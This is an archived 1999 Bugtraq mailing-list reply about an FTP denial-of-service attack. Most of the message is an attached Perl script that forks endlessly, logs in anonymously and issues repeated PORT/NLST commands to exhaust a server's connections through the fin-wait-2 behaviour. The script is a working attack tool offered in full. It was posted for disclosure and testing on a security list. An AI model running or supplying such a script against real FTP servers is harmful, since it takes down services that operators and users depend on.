[12894] in bugtraq

home help back first fref pref prev next nref lref last post

Re: FTP denial of service attack

daemon@ATHENA.MIT.EDU (Darren Reed)
Wed Dec 8 23:37:27 1999

Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id:  <199912080701.SAA19726@cairo.anu.edu.au>
Date:         Wed, 8 Dec 1999 18:01:53 +1100
Reply-To: Darren Reed <avalon@COOMBS.ANU.EDU.AU>
From: Darren Reed <avalon@COOMBS.ANU.EDU.AU>
X-To:         Theo de Raadt <deraadt@cvs.openbsd.org>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <199912080541.WAA07911@cvs.openbsd.org> from "Theo de Raadt" at
              Dec 07, 1999 10:41:45 PM

In some mail from Theo de Raadt, sie said:
[...]
> The OpenBSD ftpd has never permitted more than 1 connection at a time
> in PASV mode, thus this particular denial of service attack does not
> work.

Excellent.

> I caused myself some difficulties by accidentally starting up 400 perl
> instances, though..

There's no helping pilot error ;)

Below is an attached perl script which attacks based on the fin-wait-2
`problem'.

Darren


#!/usr/bin/perl

$DOS_HOST="localhost";

use IO::Socket;

$pid = $$;
$num = 0;


while (1) {
        while (fork) {
                $sock = IO::Socket::INET->new(
                        Proto    => "tcp",
                        PeerAddr => $DOS_HOST,
                        PeerPort => "ftp(21)",
                );
                last if (!$sock);
                $me = getsockname($sock);
                ($mport, $mip) = unpack_sockaddr_in($me);

                if (!$sock) {
                        print "connect failed!\n";
                        waitpid -1,0;
                }

                $sock->autoflush(1);

                while (<$sock>) {
                        print;
                        print $sock "USER anonymous\r\n" if (/^220 .*/);
                        print $sock "PASS root@\r\n" if (/^331 .*/);

                        if (/^150 .*/) {
                                $conn[$num++] = $x->accept();
                        } elsif (/^200 .*/) {
                                print $sock "NLST\r\n";
                        } elsif (/^230 .*/ || /^226 .*/) {

                                $x = IO::Socket::INET->new(
                                        Proto    => "tcp",
                                        LocalAddr => inet_ntoa($mip),
                                        Listen => 1,
                                );
                                last if (!$x);

                                $lsock[$num] = $x;
                                $local = getsockname($x);
                                ($lport, $lip) = unpack_sockaddr_in($local);
                                ($sip = inet_ntoa($mip)) =~ s/\./,/g;
                                $lp[0] = $lport >> 8;
                                $lp[1] = $lport & 0xff;

                                print $sock "PORT $sip,$lp[1]\r\n";
                        }
                        last if (/^530 .*/);
                }
                waitpid -1,0;
        }
        sleep(5);
}
home help back first fref pref prev next nref lref last post